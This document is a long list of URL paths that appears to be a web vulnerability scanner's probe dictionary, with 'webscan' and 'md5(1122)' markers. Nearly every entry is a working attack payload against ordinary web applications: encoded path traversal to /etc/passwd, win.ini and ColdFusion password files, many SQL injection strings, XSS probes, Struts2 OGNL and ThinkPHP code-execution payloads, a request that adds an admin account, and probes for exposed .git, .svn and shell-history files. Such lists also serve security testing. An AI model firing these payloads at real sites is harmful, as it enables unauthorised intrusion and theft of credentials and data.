/$ /%20..%5Cweb-inf /%22%3E%3CsCrIpT%3Eprompt(42873) /%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini /%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd /%3Cscript%20s%3Ealert(42873) /%3Cscript%3Ealert(42873).do /%3f.jsp /%5C /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini /'IHLD /'[.](,.)(%22HLJX /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd /.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd /.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd /..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini /..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini /..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd /..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini /..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini /..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini /.../.../.../.../.../.../.../.../etc/passwd /.../.../.../.../.../.../.../.../windows/win.ini /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini /.bash_history /.bashrc /.git/config /.idea/ /.rediscli_history /.svn/entries /.svn/wc.db //admin/include/common.inc.php?met_admin_type_ok=1&langset=web&met_langadmin[web][]=12345&str=print%28md5%281122%29%29%3B%3F%3E%2f%2f //siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20-- //wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1 /3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html /?%22onmouseover='prompt(42873)'bad=%22%3E /?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909 /?/people/360webscan?notification_id-360webscan' /?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1 /?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23 /?__runfile0123456789=/etc/passwd /?__runfile0123456789=c:%5Cwindows%5Cwin.ini /?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list /?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed) /?app=widget&mod=feedlist&act=getdata&maxId=111&act=loadNew&templateCacheFile=C:%5CWindows%5Cwin.ini /?callback=%3Cscript%3Eprompt(42873)%3C/script%3E /?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html /?m=User&a=login_800&from=tuan800&sign=xxoo&qname=%27%20AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x7765627363616e%29%2CFLOOR%28RAND%280%29%2a2%29%29X%20FROM%20information_schema.tables%20GROUP%20BY%20X%29a%29%23 /?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a /?m=info.detail&id=1-webscan /?m=offer&s=offer_list&id=1-webscan%23 /?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23 /?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23 /?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00 /?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23 /?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members /?overview /?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1/**/and/**/extractvalue(1,concat(0x5c,md5(1122)));-- /?plugins&q=area&name=type=p,c&area=1&area_id=updatexml(1,concat(md5(0x41144),user()),1) /?plugins&q=prosite&site_id=updatexml(1,concat(md5(0x41144),user()),1) /?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html /?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23 /?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html /?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html /?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/ /?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D /?search=just_test_not_find_href /?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1 /?user&q=action/check_email&email=%27%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28md5%280x7765627363616e%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 /?user&q=login&&q=check_email&email=test@sec.org%27%20and%20(Select%201%20from%20(Select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 /?user&q=login&&q=check_username&username=only_test%27%20and%20(Select%201%20from%20(Select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 /?user-getpass-1' /?user-space-1' /?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E /API/GetPageHtml.aspx /Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin /ActivityList.asp /Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20-- /Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20-- /Admin/sqlPlatform/operateSql.aspx /AdminP /Adminiscentertrator/AdmIndex.asp /App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20-- /App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20-- /ApplyGuide.aspx?infoFlowId=00449'and((char(106)%2bchar(59))=1)-- /Article/?KeyWord=1'%20and%201=char(97)%20-- /Article/?Type=18%20/**/and/**/1=char(106)-- /Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)-- /AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA== /BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20-- /BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1 /BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0-- /Biogenic.asp?Tbynf=21'%20and%201=char(106)%20-- /Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at /Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20-- /Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20-- /Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)-- /Broadcast/BroadcastViewnew.aspx?type=InfoTPXW&InfoId=1'and%20(char(105)%2bchar(59))=1-- /Broadcast/ShowFormList.aspx?formId=1'%20and%20(char(106)%2bchar(58))=1-- /Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20-- /Bulletin/CaiLiaoList.aspx?infoFlowId=1'%20and%20(char(106)%2bchar(58))=1-- /Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20-- /Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)-- /Bulletin/InfoBulletin.aspx?infoId=1'%20and%20(char(106)%2bchar(58))=1-- /Business/OfflineDownload.aspx?filetype=html&formid=1'%20and%20(char(106)%2bchar(58))=1-- /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en /CFIDE/administrator/logging/settings.cfm?locale=../../../../custommenu.xml%00en /CVS/ /CVS/Root /Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)-- /Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20-- /Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)-- /CmxLogin.php?t=14431680671059 /Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20-- /Comm/UploadFile/webUpload.aspx?AttId=x.cer&FilePath=/../web /CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20-- /CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20-- /Comment/Comment.aspx?id=11'%20and%201=char(106)%20-- /CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin /CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin /Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-30002%20UNION%20SELECT%201,concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version()),3,4,5 /Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20-- /CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20-- /CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20-- /CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20-- /CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20-- /CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20-- /CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20-- /CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20-- /CorporateCulture/kaizen_download.aspx?file_id=1')%20and%20(select%20char(86)%2bchar(76))%3E0-- /Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20-- /DataBase/%23$DB.mdb /Databases/0791idc.mdb /Databases/asp99cms.mdb /Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20-- /DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime= /Directory/iframeAgencyFunctions.jsp?department_no=1'%20UNION%20ALL%20SELECT%20NULL,CHR(58)%7C%7CCHR(113)%7C%7CCHR(110)%7C%7CCHR(116)%7C%7CCHR(58)%7C%7CCHR(97)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(117)%7C%7CCHR(112)%7C%7CCHR(58),NULL%20FROM%20DUAL--%20 /Directory/showLeader.jsp?LeadId=-1%20UNION%20ALL%20SELECT%20NULL,CHR(58)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(58)%7C%7CCHR(89)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(58),NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&department_id=null&department_name=&department_no=1 /Directory/showNsjg.jsp?NsjgId=-1%20UNION%20ALL%20SELECT%20NULL,CHR(58)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(58)%7C%7CCHR(85)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(58)%20FROM%20DUAL--%20&department_id=&department_name=&department_no=013628024 /Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20-- /Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20-- /DocCenterService/image?photo_id=10443&photo_size=../../../../../../../../../../etc/passwd%00 /Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0 /Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0 /DownloadShow.asp /Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10×tamp= /Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106)) /Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20-- /Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey /EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107)) /Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23 /ErrorInfDownLoad?errorName=/../../../../was/webroot/WEB-INF/web.xml /Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D /ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/-- /ExportToExcel?method=txtDownload&destFile=/../../../../was/webroot/WEB-INF/web.xml /ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20-- /FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106) /FCKeditor/editor/filemanager/browser/default/browser.html/fckeditor/editor/dialog/fck_about.html /FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105)) /FWeb/WorkRoomWeb/Web/Index.aspx?TID=1002%20AND%208259%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2bCHAR%28108%29%2bCHAR%28105%29%2bCHAR%28117%29%2bCHAR%28113%29%2b%28SELECT%20%28CASE%20WHEN%20%288259%3D8259%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%28113%29%2bCHAR%28112%29%2bCHAR%28111%29%2bCHAR%28116%29%2bCHAR%28113%29%29%29 /FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))-- /FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1 /FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))-- /FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20-- /Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1 /FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date= /FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1 /FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)-- /FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+-- /FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/-- /FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL-- /FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL-- /Global.asa /Global.asax /Global.asax.cs /Goods-showcate-id-1.html'cfreer /Guest/Baike/Details.aspx?soure=manager&tittle=1'/**/aNd/**/char(106)=1/**/-- /Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100)) /HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin /Inc/conn.asp /Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0-- /Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')] /InteractiveCommunication/ProjectList.aspx?sxname=1'%20and%20(char(106)%2bchar(59))=1%20and%20'%25'=' /Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1 /Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0 /Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')] /Login.asp /Login.aspx /Login.aspx?APPSecret=-12'%20and%201=char(66)%20-- /Login.jsp /Login.php /LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0 /MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602 /Manual/Manual.jsp?depid=-2550'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(116)%7C%7CCHR(109)%7C%7CCHR(103)%7C%7CCHR(113)%7C%7CCHR(112)%7C%7CCHR(105)%7C%7CCHR(82)%7C%7CCHR(76)%7C%7CCHR(100)%7C%7CCHR(99)%7C%7CCHR(76)%7C%7CCHR(99)%7C%7CCHR(71)%7C%7CCHR(83)%7C%7CCHR(113)%7C%7CCHR(97)%7C%7CCHR(97)%7C%7CCHR(122)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL-- /Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal¶m=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417 /MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20-- /MockLogin.aspx /ModifyNewsAction.do?newsID=-12 /ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23 /ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23 /Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1 /MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1 /MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20-- /NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd /NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23 /NTBookAdvancedSearch.aspx?publishFrom=0&publishTo=0&KeyWord1=2&Index1=4&Index2=5&KeyWord2=11111&Index3=6&KeyWord3=just'%7C%7C(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(109)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(107)%7C%7CCHR(77)%7C%7CCHR(85)))%20FROM%20DUAL)%7C%7C' /NTBookRetr.aspx?page=1&Index=2&LocLmt=&SrchTab=0&Acurate=0&KeyWord=1111'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%202918=2918%20AND%205953=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(103)%7C%7CCHR(99)%7C%7CCHR(98)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(5953=5953)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(103)%7C%7CCHR(101)%7C%7CCHR(112)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL))%7C%7C' /NTBookRetrNewBookDetail.aspx?page=1&Index=6&ClassKey=E'+and+1=(SELECT%201%20FROM%20DUAL%20WHERE%202918=2918%20AND%205953=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(103)%7C%7CCHR(99)%7C%7CCHR(98)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(5953=5953)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(103)%7C%7CCHR(101)%7C%7CCHR(112)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL))%20AND%20'1'='1 /NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++ 